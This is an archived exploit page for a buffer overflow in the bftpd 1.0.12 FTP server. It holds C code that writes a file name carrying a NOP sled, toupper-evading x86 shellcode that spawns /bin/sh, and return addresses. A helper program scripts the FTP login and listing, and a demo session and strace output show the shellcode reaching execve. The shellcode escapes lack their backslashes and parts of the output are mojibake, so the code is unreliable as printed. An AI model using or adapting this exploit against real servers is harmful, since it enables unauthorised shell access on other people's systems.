[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BFTPd 1.0.12 Remote Exploit
# Published : 2000-12-11
# Author : korty
# Previous Title : LPRng 3.6.24-1 Remote Root Exploit
# Next Title : LPRng 3.6.22/23/24 Remote Root Exploit


/*                                                                                                                                             
  Creates a filname to exploit the bug in bftpd 1.0.12                                                                                           
  Create the file, cwd in the shell directory and nlist the file directory.  

  Coded by korty <cb@grolier.fr>
*/

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <fcntl.h>


#define LEN 205

int main (int argc, char **argv)
{
  char buf[LEN + 12];
  int  ret = 0xbffffa80;
  int  *p;
  int  fp;
  
  char code[]=

 /*
  *  Linux/x86
  *
  *  toupper() evasion, standard execve() /bin/sh (used eg. in various
  *  imapd exploits). Goes through a loop adding 0x20 to the 
  *  (/bin/sh -= 0x20) string (ie. yields /bin/sh after addition).
  */

  /* main: */
  "xebx29"                            /* jmp callz                   */
  /* start: */
  "x5e"                                /* popl %esi                   */
  "x29xc9"                            /* subl %ecx, %ecx             */
  "x89xf3"                            /* movl %esi, %ebx             */
  "x89x5ex08"                        /* movl %ebx, 0x08(%esi)       */
  "xb1x07"                            /* movb $0x07, %cl             */
  /* loopz: */
  "x80x03x20"                        /* addb $0x20, (%ebx)          */
  "x43"                                /* incl %ebx                   */
  "xe0xfa"                            /* loopne loopz                */
  "x29xc0"                            /* subl %eax, %eax             */
  "x88x46x07"                        /* movb %al, 0x07(%esi)        */
  "x89x46x0c"                        /* movl %eax, 0x0c(%esi)       */
  "xb0x0b"                            /* movb $0x0b, %al             */
  "x87xf3"                            /* xchgl %esi, %ebx            */
  "x8dx4bx08"                        /* leal 0x08(%ebx), %ecx       */
  "x8dx53x0c"                        /* leal 0x0c(%ebx), %edx       */
  "xcdx80"                            /* int $0x80                   */
  "x29xc0"                            /* subl %eax, %eax             */
  "x40"                                /* incl %eax                   */
  "xcdx80"                            /* int $0x80                   */
  /* callz: */
  "xe8xd2xffxffxff"                /* call start                  */
  "x0fx42x49x4ex0fx53x48";       /* /bin/sh -= 0x20             */



  if (argc > 1) {
    ret += atoi(argv[1]);
    fprintf(stderr, "Using ret %#010xn", ret);
  }

  memset(buf, 'x90', LEN);
  memcpy(buf + LEN - strlen(code), code, strlen(code));

  p = (int *) (buf + LEN);

  *p++ = ret;
  *p++ = ret;
  *p   = 0;

  fp = open(buf, O_CREAT);
  if(fp < 0) perror("buf");
  close(fp);

}
/*

-- BEGIN list.c --


#include <stdio.h>

int main()

{

#define USER "cb"
#define PASS "PasSwoRd"
#define PORT "port 127,0,0,1,4,4"  // Data on the port 1028 with the addr 127.0.0.1
#define CWD "cwd longfile"
#define LIST "list"

printf("user %sn", USER);
sleep(1);
printf("pass %sn", PASS);
sleep(1);
printf("%sn", PORT);
sleep(1);
printf("%sn", CWD);
sleep(1);
printf("%sn", LIST);

}


-- END list.c --







  A)  DEMO  


tshaw:~/longfile$ gcc -o exploit exploit.c 
tshaw:~/longfile$ ls
exploit*  exploit.c  list.c
tshaw:~/longfile$ ls
exploit*  exploit.c  list.c
tshaw:~/longfile$ ./exploit 
tshaw:~/longfile$ ls
exploit*
exploit.c
list.c
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220313)^)311211323211^b221a20003 C
300332)300210Fa211Ff220v203323211Kb211Sf311200)300@311200310322333
33333313BIN13SH200332333233200332333233*
tshaw:~/longfile$ 

tshaw:~/longfile$ gcc -o list list.c

tshaw:~/longfile$ nc -l -p 1028 &
[1] 29973
tshaw:~/longfile$ 


tshaw:~/longfile$ (./list ; cat) | nc localhost 21
220 bftpd 1.0.12 at 127.0.0.1 ready.
331 Password please.
230 User logged in.
200 PORT 127.0.0.1:1028 OK
250 OK

150 Data connection established.
drwxr-xr-x   2 1000     100          4096 Dec  8 04:06 .
drwxr-xr-x  55 1000     100          4096 Dec  8 04:02 ..
-rw-r--r--   1 1000     100           323 Dec  8 04:06 list.c
-rwxr-xr-x   1 1000     100         11931 Dec  8 04:06 list
-rw-r--r--   1 1000     100          2178 Dec  8 03:54 exploit.c
-rwxr-xr-x   1 1000     100         12861 Dec  8 03:56 exploit
-r-xr--r--   1 1000     100             0 Dec  8 03:56 &#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;
&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;
&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;?^)??? C&#29481;)&#54594;F&#45935;
                                                                 ?
                                                                  &#45665;&#46858;S
                                                                       ?)??&#33048;&#63735;&#63735;&#63735;BINSH&#128;????

[1]+  Done                    nc -l -p 1028
tshaw:~/longfile$ 



   B)  STRACE OUTPUT


tshaw:~# ps -aef |grep bftpd

cb       30128    62  0 Dec04 ?        00:00:00 bftpd
root     30136 30024  0 Dec04 ttyqa    00:00:00 grep bftpd

tshaw:~# strace -p 30128

read(0, "n", 4096)                     = 1
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
setsockopt(4, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(4, SOL_SOCKET, SO_SNDBUF, [65536], 4) = 0
bind(4, {sin_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
connect(4, {sin_family=AF_INET, sin_port=htons(1028), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
write(2, "150 Data connection established."..., 34) = 34
open("/dev/null", O_RDONLY|O_NONBLOCK|0x10000) = -1 ENOENT (No such file or directory)
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
open(".", O_RDONLY|O_NONBLOCK|0x10000)  = 5
fstat(5, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
fcntl(5, F_SETFD, FD_CLOEXEC)           = 0
brk(0x8052000)                          = 0x8052000
getdents(5, /* 7 entries */, 3933)      = 328
stat("./.", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
send(4, "drwxr-xr-x   2 1000     100     "..., 58, 0) = 58
stat("./..", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
send(4, "drwxr-xr-x  55 1000     100     "..., 59, 0) = 59
stat("./list.c", {st_mode=S_IFREG|0644, st_size=323, ...}) = 0
send(4, "-rw-r--r--   1 1000     100     "..., 63, 0) = 63
stat("./list", {st_mode=S_IFREG|0755, st_size=11931, ...}) = 0
send(4, "-rwxr-xr-x   1 1000     100     "..., 61, 0) = 61
stat("./exploit.c", {st_mode=S_IFREG|0644, st_size=2178, ...}) = 0
send(4, "-rw-r--r--   1 1000     100     "..., 66, 0) = 66
stat("./exploit", {st_mode=S_IFREG|0755, st_size=12861, ...}) = 0
send(4, "-rwxr-xr-x   1 1000     100     "..., 64, 0) = 64
stat("./&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;?
&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47662;)^)??? C&#29481;)&#54594;F&#45935;
                  ?
                   &#45665;&#46858;S
                        ?)??&#33048;&#63735;&#63735;&#63735;BINSH&#128;????, {st_mode=S_IFREG|S_ISUID|0544, st_size=0, ...}) = 0
send(4, "-r-xr--r--   1 1000     100     "..., 270, 0) = 270
execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = -1 ENOENT (No such file or directory)
_exit(-1073743151)                      = ?

tshaw:~# 

*/


// www.Syue.com [2000-12-11]